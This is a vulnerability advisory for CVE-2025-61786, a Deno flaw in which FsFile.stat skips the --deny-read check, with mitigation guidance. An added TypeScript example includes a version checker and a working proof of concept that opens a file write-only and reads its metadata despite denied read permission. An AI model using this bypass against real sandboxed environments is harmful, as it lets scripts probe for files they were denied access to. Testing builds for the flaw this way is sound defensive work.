CVE-2025-61786
BaseFortify
Publication date: 2025-10-08
Last updated on: 2025-10-16
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Affected version range |
|---|---|---|
| deno | deno | All releases before 2.2.15 (2.2.15 is the backport fix) |
| deno | deno | From 2.3.0 (inc) to 2.5.3 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-269 | Improper Privilege Management: the product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor. |
AI Powered Q&A
Can you explain this vulnerability to me?
Deno releases before 2.2.15, and releases from 2.3.0 up to but not including 2.5.3, let a script bypass the permission model that restricts reading files. The methods Deno.FsFile.prototype.stat and Deno.FsFile.prototype.statSync do not enforce a --deny-read=./ permission, so a script can retrieve file metadata for a file it has no read access to. The bypass works even when the script runs with read permission explicitly denied and the file handle was opened with write-only flags: only write permission is checked on open, and the stat call on the resulting handle performs no read check at all. The issue is fixed in versions 2.5.3 and 2.2.15.
How can this vulnerability impact me?
A script running under a deny-read policy can obtain metadata about files it should not be able to inspect: size, modification and access timestamps, file type, and whether a given path exists at all. File contents are not exposed, but this metadata is useful for reconnaissance (for example, confirming the presence of secrets files or timing changes to them) and undermines the guarantee that --deny-read is meant to provide.
What immediate steps should I take to mitigate this vulnerability?
Upgrade Deno to 2.5.3 or later; on the 2.2 line, upgrade to 2.2.15 or later. Those releases make Deno.FsFile.prototype.stat and statSync enforce the read permission, so a stat call on a handle opened without read access fails under --deny-read. Until you can upgrade, treat --deny-read as not restricting file metadata for any script that also holds write permission.
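The following is an added example, not code from the advisory or the Deno project, covering both the bypass described above and the upgrade check. isAffected() evaluates a Deno version string against the two affected ranges on this page. probeStatBypass() is a hypothetical probe: run under Deno as `deno run --allow-write --deny-read=./ probe.ts`, it opens a file write-only (read: false, so no read permission is needed to open it) and calls FsFile.stat(). On a vulnerable build the call returns metadata despite --deny-read; on a fixed build it is expected to fail with a Deno.errors.NotCapable permission error. The probe file name is an assumption; the probe only runs when a Deno global is present, so the version check can be exercised anywhere.

```typescript
// Added example (not from the advisory or the Deno project).
// 1. isAffected(): checks a Deno version against the advisory's ranges
//    (< 2.2.15, and >= 2.3.0 < 2.5.3).
// 2. probeStatBypass(): under Deno, opens a file write-only and calls
//    FsFile.stat() to see whether --deny-read is enforced on the handle.

type Semver = [number, number, number];

function parseSemver(v: string): Semver {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(v.trim());
  if (!m) throw new Error(`unrecognised version: ${v}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

function cmp(a: Semver, b: Semver): number {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// true when the given Deno version falls inside an affected range
function isAffected(version: string): boolean {
  const v = parseSemver(version);
  const lt = (s: string) => cmp(v, parseSemver(s)) < 0;
  const ge = (s: string) => cmp(v, parseSemver(s)) >= 0;
  // Range 1: every release before 2.2.15 (2.2.15 carries the backported fix).
  if (lt("2.2.15")) return true;
  // Range 2: 2.3.0 up to but excluding 2.5.3 (the mainline fix).
  return ge("2.3.0") && lt("2.5.3");
}

// Probe for the bypass. Requires Deno; intended invocation:
//   deno run --allow-write --deny-read=./ probe.ts
// The target path is a hypothetical choice for this example.
async function probeStatBypass(
  path = "./probe-target.txt",
): Promise<"vulnerable" | "fixed"> {
  const deno = (globalThis as Record<string, any>).Deno;
  if (!deno) throw new Error("probeStatBypass must run under Deno");

  // read: false is essential: Deno.open defaults read to true, which would
  // correctly fail under --deny-read before stat() is ever reached.
  const file = await deno.open(path, { read: false, write: true, create: true });
  try {
    // Vulnerable builds return metadata here even though reads are denied.
    const info = await file.stat();
    console.log("stat succeeded under --deny-read:", info.size, info.mtime);
    return "vulnerable";
  } catch (e) {
    // Fixed builds are expected to reject the call with a permission error.
    if (e instanceof deno.errors.NotCapable) return "fixed";
    throw e;
  } finally {
    file.close();
  }
}

if ((globalThis as Record<string, any>).Deno) {
  probeStatBypass().then((r) => console.log("result:", r));
}
```

Run `deno --version` and feed the first line's version into isAffected() to decide whether the upgrade is outstanding; the probe gives a runtime answer independent of the version string, which is useful when the binary has been patched or vendored.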